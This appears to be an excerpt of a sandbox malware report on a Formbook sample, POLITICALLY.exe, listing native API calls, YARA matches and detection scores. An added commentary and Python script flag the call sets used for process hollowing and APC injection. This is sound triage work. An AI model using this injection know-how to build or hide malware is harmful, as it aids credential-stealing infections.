Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221AE71 NtWriteVirtualMemory, 2_2_0221AE71
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DC36 NtAllocateVirtualMemory, 2_2_0221DC36
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222F270 NtMapViewOfSection, 2_2_0222F270
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221E245 NtAllocateVirtualMemory, 2_2_0221E245
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B24A NtWriteVirtualMemory, 2_2_0221B24A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221E378 NtAllocateVirtualMemory, 2_2_0221E378
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B3D0 NtWriteVirtualMemory, 2_2_0221B3D0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222F3D4 NtMapViewOfSection, 2_2_0222F3D4
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B121 NtWriteVirtualMemory, 2_2_0221B121
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222F658 NtMapViewOfSection, 2_2_0222F658
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B698 NtWriteVirtualMemory, 2_2_0221B698
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222F768 NtMapViewOfSection, 2_2_0222F768
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B7FC NtWriteVirtualMemory, 2_2_0221B7FC
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B514 NtWriteVirtualMemory, 2_2_0221B514
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222F519 NtMapViewOfSection, 2_2_0222F519
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221BA7C NtWriteVirtualMemory, 2_2_0221BA7C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DB19 NtAllocateVirtualMemory, 2_2_0221DB19
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02212B60 NtWriteVirtualMemory, 2_2_02212B60
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221BBB2 NtWriteVirtualMemory, 2_2_0221BBB2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222EB8C NtMapViewOfSection, 2_2_0222EB8C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222F896 NtMapViewOfSection, 2_2_0222F896
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B932 NtWriteVirtualMemory, 2_2_0221B932
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221BE0D NtWriteVirtualMemory, 2_2_0221BE0D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221AE76 NtWriteVirtualMemory, 2_2_0221AE76
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221CEAB NtWriteVirtualMemory, 2_2_0221CEAB
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222EF21 NtMapViewOfSection, 2_2_0222EF21
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221BF4D NtWriteVirtualMemory, 2_2_0221BF4D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221AFD8 NtWriteVirtualMemory, 2_2_0221AFD8
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DFD8 NtAllocateVirtualMemory, 2_2_0221DFD8
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221BCDC NtWriteVirtualMemory, 2_2_0221BCDC
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222EDB9 NtMapViewOfSection, 2_2_0222EDB9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221DD81 NtAllocateVirtualMemory, 2_2_0221DD81
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279660 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_1E279660
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2796E0 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_1E2796E0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279710 NtQueryInformationToken,LdrInitializeThunk, 10_2_1E279710
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2797A0 NtUnmapViewOfSection,LdrInitializeThunk, 10_2_1E2797A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279780 NtMapViewOfSection,LdrInitializeThunk, 10_2_1E279780
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279FE0 NtCreateMutant,LdrInitializeThunk, 10_2_1E279FE0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279540 NtReadFile,LdrInitializeThunk, 10_2_1E279540
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2795D0 NtClose,LdrInitializeThunk, 10_2_1E2795D0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279A20 NtResumeThread,LdrInitializeThunk, 10_2_1E279A20
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279A00 NtProtectVirtualMemory,LdrInitializeThunk, 10_2_1E279A00
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279A50 NtCreateFile,LdrInitializeThunk, 10_2_1E279A50
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279860 NtQuerySystemInformation,LdrInitializeThunk, 10_2_1E279860
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279840 NtDelayExecution,LdrInitializeThunk, 10_2_1E279840
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2798F0 NtReadVirtualMemory,LdrInitializeThunk, 10_2_1E2798F0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279910 NtAdjustPrivilegesToken,LdrInitializeThunk, 10_2_1E279910
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2799A0 NtCreateSection,LdrInitializeThunk, 10_2_1E2799A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279610 NtEnumerateValueKey, 10_2_1E279610
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279670 NtQueryInformationProcess, 10_2_1E279670
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279650 NtQueryValueKey, 10_2_1E279650
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2796D0 NtCreateKey, 10_2_1E2796D0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279730 NtQueryVirtualMemory, 10_2_1E279730
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27A710 NtOpenProcessToken, 10_2_1E27A710
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279760 NtOpenProcess, 10_2_1E279760
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27A770 NtOpenThread, 10_2_1E27A770
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279770 NtSetInformationFile, 10_2_1E279770
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279520 NtWaitForSingleObject, 10_2_1E279520
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27AD30 NtSetContextThread, 10_2_1E27AD30
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279560 NtWriteFile, 10_2_1E279560
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2795F0 NtQueryInformationFile, 10_2_1E2795F0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279A10 NtQuerySection, 10_2_1E279A10
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279A80 NtOpenDirectoryObject, 10_2_1E279A80
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279B00 NtSetValueKey, 10_2_1E279B00
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27A3B0 NtGetContextThread, 10_2_1E27A3B0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279820 NtEnumerateKey, 10_2_1E279820
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27B040 NtSuspendThread, 10_2_1E27B040
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2798A0 NtWriteVirtualMemory, 10_2_1E2798A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279950 NtQueueApcThread, 10_2_1E279950
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2799D0 NtCreateProcessEx, 10_2_1E2799D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048695D0 NtClose,LdrInitializeThunk, 23_2_048695D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869540 NtReadFile,LdrInitializeThunk, 23_2_04869540
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048696D0 NtCreateKey,LdrInitializeThunk, 23_2_048696D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048696E0 NtFreeVirtualMemory,LdrInitializeThunk, 23_2_048696E0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869650 NtQueryValueKey,LdrInitializeThunk, 23_2_04869650
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869660 NtAllocateVirtualMemory,LdrInitializeThunk, 23_2_04869660
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869780 NtMapViewOfSection,LdrInitializeThunk, 23_2_04869780
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869FE0 NtCreateMutant,LdrInitializeThunk, 23_2_04869FE0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869710 NtQueryInformationToken,LdrInitializeThunk, 23_2_04869710
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869840 NtDelayExecution,LdrInitializeThunk, 23_2_04869840
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869860 NtQuerySystemInformation,LdrInitializeThunk, 23_2_04869860
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048699A0 NtCreateSection,LdrInitializeThunk, 23_2_048699A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869910 NtAdjustPrivilegesToken,LdrInitializeThunk, 23_2_04869910
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869A50 NtCreateFile,LdrInitializeThunk, 23_2_04869A50
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048695F0 NtQueryInformationFile, 23_2_048695F0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869520 NtWaitForSingleObject, 23_2_04869520
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0486AD30 NtSetContextThread, 23_2_0486AD30
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869560 NtWriteFile, 23_2_04869560
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869610 NtEnumerateValueKey, 23_2_04869610
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869670 NtQueryInformationProcess, 23_2_04869670
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048697A0 NtUnmapViewOfSection, 23_2_048697A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0486A710 NtOpenProcessToken, 23_2_0486A710
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869730 NtQueryVirtualMemory, 23_2_04869730
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869760 NtOpenProcess, 23_2_04869760
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0486A770 NtOpenThread, 23_2_0486A770
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869770 NtSetInformationFile, 23_2_04869770
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048698A0 NtWriteVirtualMemory, 23_2_048698A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048698F0 NtReadVirtualMemory, 23_2_048698F0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869820 NtEnumerateKey, 23_2_04869820
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0486B040 NtSuspendThread, 23_2_0486B040
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048699D0 NtCreateProcessEx, 23_2_048699D0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869950 NtQueueApcThread, 23_2_04869950
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869A80 NtOpenDirectoryObject, 23_2_04869A80
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869A00 NtProtectVirtualMemory, 23_2_04869A00
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869A10 NtQuerySection, 23_2_04869A10
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869A20 NtResumeThread, 23_2_04869A20
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0486A3B0 NtGetContextThread, 23_2_0486A3B0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869B00 NtSetValueKey, 23_2_04869B00
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B83A0 NtAllocateVirtualMemory, 23_2_030B83A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B8270 NtReadFile, 23_2_030B8270
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B82F0 NtClose, 23_2_030B82F0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B81C0 NtCreateFile, 23_2_030B81C0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B839A NtAllocateVirtualMemory, 23_2_030B839A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B826A NtReadFile, 23_2_030B826A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B82EA NtClose, 23_2_030B82EA
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030B81BA NtCreateFile, 23_2_030B81BA
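The Nt* names above are what the report's process-injection verdicts rest on. Process 10 (the second POLITICALLY.exe, whose memory dumps carry the 0000000A prefix) contains NtCreateSection, NtMapViewOfSection, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread and NtQueueApcThread, which is the complete tool set for process hollowing, section-mapping injection and APC injection, and process 23 (control.exe) carries the same list. The Python below is an added example and not part of the Joe Sandbox report: it parses "Code function" lines, collects the native-call names per process index and reports which of a few hand-picked call sets are complete. The regular expression, the PATTERNS table and the sample lines (a subset copied from this section, labelled as constructed) are mine.

```python
"""Group a sandbox report's 'Code function: <proc>_<n>_<addr> NtXxx' lines
by process and check which injection-related native-call sets are complete.
Added example; not part of the Joe Sandbox report."""
import re
from collections import defaultdict

# One "Code function" line. <proc> is the report's process index (10 here is
# the same process as the 0000000A memory-dump prefix). Extra names the report
# lists after the Nt call (e.g. LdrInitializeThunk) are dropped below.
CODE_FN = re.compile(
    r"Source:\s+(?P<image>\S+)\s+Code function:\s+"
    r"(?P<proc>\d+)_\d+_[0-9A-Fa-f]+\s+(?P<calls>(?:Nt|Zw)\w+(?:,\w+)*)"
)

# Hand-picked call sets (assumption: my own grouping, not a sandbox rule).
PATTERNS = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "section mapping injection": {"NtCreateSection", "NtMapViewOfSection",
                                  "NtWriteVirtualMemory"},
    "APC thread injection": {"NtOpenThread", "NtQueueApcThread"},
    "token privilege adjustment": {"NtOpenProcessToken",
                                   "NtAdjustPrivilegesToken"},
}


def parse_native_calls(lines):
    """Return {(proc, image): set of Nt*/Zw* names} from report lines."""
    calls = defaultdict(set)
    for line in lines:
        m = CODE_FN.search(line)
        if not m:
            continue
        key = (m.group("proc"), m.group("image"))
        for name in m.group("calls").split(","):
            if name.startswith(("Nt", "Zw")):
                calls[key].add(name)
    return dict(calls)


def match_techniques(calls):
    """Return {(proc, image): [patterns whose whole call set is present]}."""
    return {key: [name for name, required in PATTERNS.items() if required <= seen]
            for key, seen in calls.items()}


SAMPLE_LINES = [  # constructed: a subset of this report's "Code function" lines
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221E378 NtAllocateVirtualMemory, 2_2_0221E378",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221B3D0 NtWriteVirtualMemory, 2_2_0221B3D0",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222F3D4 NtMapViewOfSection, 2_2_0222F3D4",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2797A0 NtUnmapViewOfSection,LdrInitializeThunk, 10_2_1E2797A0",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2798A0 NtWriteVirtualMemory, 10_2_1E2798A0",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27AD30 NtSetContextThread, 10_2_1E27AD30",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279A20 NtResumeThread,LdrInitializeThunk, 10_2_1E279A20",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2799A0 NtCreateSection,LdrInitializeThunk, 10_2_1E2799A0",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279780 NtMapViewOfSection,LdrInitializeThunk, 10_2_1E279780",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E279950 NtQueueApcThread, 10_2_1E279950",
    r"Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27A770 NtOpenThread, 10_2_1E27A770",
    r"Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0486A710 NtOpenProcessToken, 23_2_0486A710",
    r"Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04869910 NtAdjustPrivilegesToken,LdrInitializeThunk, 23_2_04869910",
]

if __name__ == "__main__":
    for key, techniques in match_techniques(parse_native_calls(SAMPLE_LINES)).items():
        print(key, techniques or "no complete pattern")
```

These entries are produced from the code found in memory, so a complete set shows capability, not that the calls were made in that order at runtime; in this report the runtime signatures ("Maps a DLL or memory area into another process", "Modifies the context of a thread in another process", "Queues an APC in another process") are what confirm it. The same calls appear in legitimate loaders and debuggers, so treat a match as a triage pointer rather than a verdict on its own.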
Detected potential crypto function
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_00404CFF 2_2_00404CFF
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E256E30 10_2_1E256E30
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FD616 10_2_1E2FD616
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E302EF7 10_2_1E302EF7
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E301FF1 10_2_1E301FF1
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30DFCE 10_2_1E30DFCE
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24841F 10_2_1E24841F
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FD466 10_2_1E2FD466
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E230D20 10_2_1E230D20
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E302D07 10_2_1E302D07
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E301D55 10_2_1E301D55
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262581 10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24D5E0 10_2_1E24D5E0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E3025DD 10_2_1E3025DD
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E3022AE 10_2_1E3022AE
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E302B28 10_2_1E302B28
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26EBB0 10_2_1E26EBB0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F03DA 10_2_1E2F03DA
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FDBD2 10_2_1E2FDBD2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30E824 10_2_1E30E824
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1002 10_2_1E2F1002
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2620A0 10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E3020A8 10_2_1E3020A8
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24B090 10_2_1E24B090
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E3028EC 10_2_1E3028EC
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E254120 10_2_1E254120
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23F900 10_2_1E23F900
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483841F 23_2_0483841F
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048ED466 23_2_048ED466
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04852581 23_2_04852581
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F25DD 23_2_048F25DD
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483D5E0 23_2_0483D5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F2D07 23_2_048F2D07
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04820D20 23_2_04820D20
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F1D55 23_2_048F1D55
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F2EF7 23_2_048F2EF7
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048ED616 23_2_048ED616
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04846E30 23_2_04846E30
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048FDFCE 23_2_048FDFCE
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F1FF1 23_2_048F1FF1
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0483B090 23_2_0483B090
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048520A0 23_2_048520A0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F20A8 23_2_048F20A8
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F28EC 23_2_048F28EC
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E1002 23_2_048E1002
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048FE824 23_2_048FE824
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0482F900 23_2_0482F900
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_04844120 23_2_04844120
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F22AE 23_2_048F22AE
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_0485EBB0 23_2_0485EBB0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048E03DA 23_2_048E03DA
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048EDBD2 23_2_048EDBD2
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_048F2B28 23_2_048F2B28
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BCB24 23_2_030BCB24
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030A2FB0 23_2_030A2FB0
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BC6F5 23_2_030BC6F5
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BC50F 23_2_030BC50F
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030A2D8A 23_2_030A2D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030A2D90 23_2_030A2D90
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030A8C5E 23_2_030A8C5E
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030A8C60 23_2_030A8C60
Source: C:\Windows\SysWOW64\control.exe Code function: 23_2_030BB4A6 23_2_030BB4A6
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: String function: 1E23B150 appears 45 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 0482B150 appears 35 times
PE file contains strange resources
Source: POLITICALLY.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: POLITICALLY.exe, 00000002.00000002.415420522.0000000002200000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs POLITICALLY.exe
Source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs POLITICALLY.exe
Source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs POLITICALLY.exe
Source: POLITICALLY.exe, 0000000A.00000002.548056458.0000000002420000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs POLITICALLY.exe
Uses 32bit PE files
Source: POLITICALLY.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@7/0@0/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_01
Source: POLITICALLY.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\POLITICALLY.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\POLITICALLY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: POLITICALLY.exe Virustotal: Detection: 17%
Source: POLITICALLY.exe ReversingLabs: Detection: 17%
Source: unknown Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'
